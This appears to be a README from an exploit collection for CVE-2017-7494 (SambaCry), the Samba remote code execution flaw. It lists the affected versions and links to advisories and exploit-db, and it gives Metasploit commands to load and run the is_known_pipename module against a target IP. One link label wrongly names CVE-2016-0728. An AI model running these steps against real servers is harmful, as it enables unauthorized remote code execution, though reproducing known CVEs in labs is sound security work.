# （CVE-2017-7494）Linux Samba 远程代码执行

CVE-2017-7494

Vulnerability reference:

- [CVE-2016-0728](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7494)
- [exp-db](https://www.exploit-db.com/exploits/42060/)

## Samba

```
Samba 3.5.0-4.6.4/4.5.10/4.4.14
```

## Usage

```
is_known_pipename.rb 放在 /usr/share/metasploit-framework/modules/exploits/linux/samba/ 目录下

msf > use exploit/linux/samba/is_known_pipename

set RHOST 192.168.220.140

run
```

## References

- [Samba远程代码执行漏洞(CVE-2017-7494)](http://thief.one/2017/05/25/2/)
- [【漏洞分析】Samba远程代码执行漏洞(CVE-2017-7494)-SambaCry分析报告](http://bobao.360.cn/learning/detail/3915.html)
- [Msf复现Samba远程代码执行漏洞](http://www.secist.com/archives/3666.html)

> https://github.com/SecWiki/linux-kernel-exploits/tree/master/2017/CVE-2017-7494